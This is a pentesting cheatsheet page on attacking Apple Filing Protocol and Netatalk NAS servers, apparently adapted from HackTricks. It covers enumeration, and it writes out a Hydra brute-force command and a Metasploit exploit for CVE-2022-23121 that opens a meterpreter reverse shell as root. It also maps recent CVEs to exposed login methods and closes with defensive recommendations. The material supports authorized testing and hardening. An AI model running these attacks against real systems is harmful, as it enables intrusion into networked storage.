daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

584-pentesting-afp.md (8668B)


      1 ---
      2 title: "548 - Pentesting Apple Filing Protocol (AFP)"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/584-pentesting-afp.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/584-pentesting-afp.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 548 - Pentesting Apple Filing Protocol (AFP)
     14 
     15 ## Basic Information
     16 
     17 The **Apple Filing Protocol** (**AFP**), formerly AppleTalk Filing Protocol, provides file services for classic Mac OS and macOS. AFP supports Unicode filenames, POSIX-style and ACL permissions, resource forks, named extended attributes, and Mac-oriented file locking.
     18 
     19 Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:
     20 
     21 * Legacy macOS / Mac OS 9 environments
     22 * NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source **Netatalk** daemon
     23 * Mixed-OS networks where Time-Machine-over-AFP is still enabled
     24 
     25 **Default TCP Port:** **548** (AFP over TCP / DSI)
     26 
     27 ```bash
     28 PORT     STATE SERVICE
     29 548/tcp  open  afp
     30 ```
     31 
     32 ---
     33 
     34 ## Enumeration
     35 
     36 ### Quick banner / server info
     37 
     38 ```bash
     39 # Metasploit auxiliary
     40 use auxiliary/scanner/afp/afp_server_info
     41 run RHOSTS=<IP>
     42 
     43 # Nmap NSE
     44 nmap -p 548 -sV --script "afp-* and not dos" <IP>
     45 ```
     46 
     47 Useful AFP NSE scripts include the following:<sup>[[5]](#references)</sup>
     48 
     49 | Script | What it does |
     50 |--------|--------------|
     51 | **afp-ls**            | List available AFP volumes and files |
     52 | **afp-brute**         | Password brute-force against AFP login |
     53 | **afp-serverinfo**    | Dump server name, machine type, AFP version, supported UAMs, etc. |
     54 | **afp-showmount**     | List shares together with their ACLs |
     55 | **afp-path-vuln**     | Detects (and can exploit) directory-traversal, CVE-2010-0533 |
     56 
     57 The NSE brute-force script can be combined with Hydra/Medusa if more control is required:
     58 
     59 ```bash
     60 hydra -L users.txt -P passwords.txt afp://<IP>
     61 ```
     62 
     63 If you already have credentials, **Nmap's AFP scripts become much more useful** because `afp-serverinfo` leaks the advertised **UAMs** (auth methods), while `afp-showmount` and `afp-ls` can enumerate reachable shares, ACLs and interesting files:
     64 
     65 ```bash
     66 nmap -p 548 --script afp-serverinfo,afp-showmount,afp-ls \
     67   --script-args 'afp.username=<USER>,afp.password=<PASS>,ls.maxdepth=2,ls.maxfiles=50' <IP>
     68 ```
     69 
     70 Pay attention to:
     71 
     72 * **Machine Type: Netatalk** in `afp-serverinfo` output, which usually means a NAS / Unix host rather than Apple's own AFP implementation.
     73 * **UAMs** such as `DHX`, `DHX2`, `Cleartxt` or `Guest`, because they directly hint at the reachable login paths and whether legacy / weak auth is enabled.
     74 * **Share ACLs** from `afp-showmount`; world-readable or drop-box style shares often expose backups, `.appl` files, and user metadata before you ever mount the volume.
     75 
     76 ### Interacting with shares
     77 
     78 *macOS*
     79 ```bash
     80 # Finder → Go → "Connect to Server…"
     81 # or from terminal
     82 mkdir /Volumes/afp
     83 mount_afp afp://USER:[email protected]/SHARE /Volumes/afp
     84 ```
     85 
     86 *Linux* (using `afpfs-ng` ‑ packaged in most distros)
     87 ```bash
     88 apt install afpfs-ng
     89 mkdir /mnt/afp
     90 mount_afp afp://USER:[email protected]/SHARE /mnt/afp
     91 # or interactive client
     92 afp_client <IP>
     93 ```
     94 
     95 Once mounted, remember that classic Mac resource-forks are stored as hidden `._*` AppleDouble files – these often hold interesting metadata that DFIR tools miss.
     96 
     97 On Netatalk targets this metadata backend also matters for exploitability:
     98 
     99 * `ea = ad` means metadata is stored in **AppleDouble v2** files / `.AppleDouble` directories.
    100 * `ea = sys` or `ea = samba` stores metadata in filesystem extended attributes instead.
    101 * In **Netatalk 4.2+** the old `appledouble` option was removed and the backend is controlled solely through the `ea` option.<sup>[[4]](#references)</sup>
    102 
    103 From an offensive perspective, this lets you quickly decide whether **AppleDouble-oriented bugs** are more likely to be reachable on the server.
    104 
    105 ---
    106 
    107 ## Common Vulnerabilities & Exploitation
    108 
    109 ### Netatalk unauthenticated RCE chain (2022)
    110 
    111 Several NAS vendors shipped **Netatalk ≤3.1.12**. A lack of bounds checking in `parse_entries()` allows an attacker to craft a malicious **AppleDouble** header and obtain **remote root** before authentication (**CVSS 9.8 – CVE-2022-23121**). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available.<sup>[[1]](#references)</sup>
    112 
    113 Metasploit (>= 6.3) ships the module `exploit/linux/netatalk/parse_entries` which delivers the payload via DSI `WRITE`.
    114 
    115 ```bash
    116 use exploit/linux/netatalk/parse_entries
    117 set RHOSTS <IP>
    118 set TARGET 0   # Automatic (Netatalk)
    119 set PAYLOAD linux/x64/meterpreter_reverse_tcp
    120 run
    121 ```
    122 
    123 If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as **root**.
    124 
    125 ### Netatalk OpenSession heap overflow (2018)
    126 
    127 Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the **DSI OpenSession** handler allowing unauthenticated code execution (**CVE-2018-1160**). A detailed analysis and PoC were published by Tenable Research.<sup>[[2]](#references)</sup>
    128 
    129 ### Newer Netatalk attack surface (2022-2024)
    130 
    131 Recent Netatalk advisories show that the attack surface is no longer limited to `parse_entries()` and OpenSession handling:<sup>[[3]](#references)</sup>
    132 
    133 * **CVE-2022-45188**: a specially crafted `.appl` file can trigger a heap overflow in `afp_getappl`; this is especially relevant if you can **write files into a share** and the server runs FCE / notify features.
    134 * **CVE-2023-42464**: a **type confusion** bug in the **Spotlight RPC** handlers can become reachable when `spotlight = yes` is enabled in `afp.conf` (disabled by default).
    135 * **CVE-2024-38439 / CVE-2024-38440 / CVE-2024-38441**: one-byte heap out-of-bounds writes in login-related paths fixed in **Netatalk 2.4.1 / 3.1.19 / 3.2.1**. These bugs are interesting because exploitability depends on the configured **UAMs**:
    136   * `uams_clrtxt.so` + PAM-backed ClearTxt login exposes the `FPLoginExt` path relevant to **CVE-2024-38439**.
    137   * `uams_dhx.so` + PAM-backed DHX login reaches the vulnerable path for **CVE-2024-38440**.
    138   * `uams_guest.so` keeps the **Guest** login path reachable for **CVE-2024-38441**.
    139 
    140 This means the output of `afp-serverinfo` is not just fingerprinting data; it helps you decide which **login parser** is exposed before spending time on exploit development or NAS firmware triage.
    141 
    142 ### Other notable issues
    143 
    144 * **CVE-2022-22995** – Symlink redirection leading to arbitrary file write / RCE when AppleDouble v2 is enabled (3.1.0 - 3.1.17).
    145 * **CVE-2010-0533** – Directory traversal in Apple Mac OS X 10.6 AFP (detected by `afp-path-vuln.nse`).
    146 * Multiple memory-safety bugs were fixed again during the **2024 Netatalk releases**; if you identify `Netatalk` in `afp-serverinfo`, spend a minute correlating the exposed UAMs / Spotlight / metadata backend with the server version before assuming only the 2018/2022 bugs matter.<sup>[[3]](#references)</sup>
    147 
    148 ---
    149 
    150 ## Defensive Recommendations
    151 
    152 1. **Disable AFP** unless strictly required – use SMB3 or NFS instead.
    153 2. If AFP must stay, use a currently supported Netatalk release or vendor firmware that backports all relevant fixes. Version 3.1.18 is a useful historical marker for several 2022–2024 fixes, but it is not a blanket minimum because later vulnerabilities required 3.1.19 or newer; maintained 4.x releases are preferable where compatible.<sup>[[3]](#references)</sup><sup>[[4]](#references)</sup>
    154 3. Enforce **Strong UAMs** (e.g. *DHX2*), disable clear-text and guest logins.
    155 4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely.
    156 5. Periodically scan with `nmap -p 548 --script afp-*` in CI/CD to catch rogue / downgraded appliances.
    157 
    158 ---
    159 
    160 ### [Brute-Force](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#afp)
    161 
    162 
    163 ## References
    164 
    165 - [1] [Netatalk Security Advisory CVE-2022-23121 – "Arbitrary code execution in parse_entries"](https://netatalk.io/security/CVE-2022-23121)
    166 - [2] [Tenable Research – "Exploiting an 18-Year-Old Bug (CVE-2018-1160)"](https://medium.com/tenable-techblog/exploiting-an-18-year-old-bug-b47afe54172)
    167 - [3] [Netatalk Security Advisories index](https://netatalk.io/security.html)
    168 - [4] [Netatalk 4.2.0 Release Notes](https://netatalk.io/4.2/ReleaseNotes4.2.0)
    169 - [5] [Nmap NSE documentation – AFP scripts](https://nmap.org/nsedoc/scripts/)